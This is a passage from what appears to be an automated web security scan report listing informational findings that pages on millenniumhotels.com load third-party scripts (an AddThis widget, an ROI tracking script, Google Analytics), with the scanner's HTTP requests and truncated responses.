<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.718. http://www.millenniumhotels.com/millenniumboston/restaurant/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/restaurant/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/restaurant/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:13:00 GMT
ETag: "3398d-ff86-91f7bc38"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.719. http://www.millenniumhotels.com/millenniumboston/rooms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/rooms/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/rooms/ HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:58 GMT
ETag: "3398d-e355-3efed479"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.720. http://www.millenniumhotels.com/millenniumboston/rooms/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/rooms/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/rooms/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:13:06 GMT
ETag: "33fac-e355-e5317d87"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.721. http://www.millenniumhotels.com/millenniumboston/rooms/suite.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/rooms/suite.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboston/rooms/suite.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:58 GMT
ETag: "33fac-e393-3efd293a"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:00:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.722. http://www.millenniumhotels.com/millenniumboston/specials/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/specials/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumboston/specials/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:58 GMT
ETag: "2b5de-ea4a-3ef9d2bc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.723. http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboston/specials/specials_0005.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumboston/specials/specials_0005.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:57 GMT
ETag: "33fae-e45a-3ef6b947"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.724. http://www.millenniumhotels.com/millenniumboulder/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumboulder/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumboulder/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:56 GMT
ETag: "3411b-fd7b-91be09b6"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.725. http://www.millenniumhotels.com/millenniumbuffalo/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumbuffalo/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumbuffalo/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:50 GMT
ETag: "34229-f803-3e853c8b"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.726. http://www.millenniumhotels.com/millenniumchicago/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumchicago/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumchicago/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:12:53 GMT
ETag: "34269-fae7-e465a478"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.727. http://www.millenniumhotels.com/millenniumcincinnati/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumcincinnati/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumcincinnati/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:41 GMT
ETag: "34298-f718-90d1c3df"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.728. http://www.millenniumhotels.com/millenniumdurham/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumdurham/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumdurham/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:36 GMT
ETag: "2c1c3-102aa-9081e518"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.729. http://www.millenniumhotels.com/millenniumlosangeles/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumlosangeles/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumlosangeles/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:12:37 GMT
ETag: "34b91-fcd7-e369a24f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.730. http://www.millenniumhotels.com/millenniumminneapolis/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumminneapolis/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumminneapolis/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:22 GMT
ETag: "34d0f-fb98-3cdab4a6"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.731. http://www.millenniumhotels.com/millenniumnashville/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumnashville/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumnashville/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:12:17 GMT
ETag: "127f0-fddc-3c864e34"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.732. http://www.millenniumhotels.com/millenniumnewyork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumnewyork/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus

Request

GET /millenniumnewyork/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:13 GMT
ETag: "13bb1-f653-8f277903"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

18.733. http://www.millenniumhotels.com/millenniumscottsdale/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumscottsdale/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumscottsdale/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:12:02 GMT
ETag: "3548d-fcad-8e7fdd4c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.734. http://www.millenniumhotels.com/millenniumstlouis/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumstlouis/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumstlouis/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:11:53 GMT
ETag: "20d5c-103b2-8df87154"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.735. http://www.millenniumhotels.com/millenniumunplazanewyork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/millenniumunplazanewyork/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019

Request

GET /millenniumunplazanewyork/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 10:11:50 GMT
ETag: "20378-f921-e0a7702d"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:03:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://track.roiservice.com/track/track.aspx?ROIID=936138107000019"></script>
...[SNIP]...

18.736. http://www.millenniumhotels.com/my/copthornepenang/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/my/copthornepenang/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /my/copthornepenang/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:11:33 GMT
ETag: "2cce2-e3fd-8cc0d461"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58365

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap"></script>
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.737. http://www.millenniumhotels.com/my/millenniumkualalumpur/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.com
Path:	/my/millenniumkualalumpur/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?username=mcilap
http://www.google-analytics.com/urchin.js

Request

GET /my/millenniumkualalumpur/index.html HTTP/1.1
Host: www.millenniumhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; GTSessionID936138107000019=a2cc436f07764ff0bdfc512bb07215f0; s_fv=flash%2010; s_sq=%5B%5BB%5D%5D; mbox=check#true#1296574056|session#1296573995979-796819#1296575856;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:11:24 GMT
ETag: "35100-e589-8c3cfbf0"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:02:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58761

                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
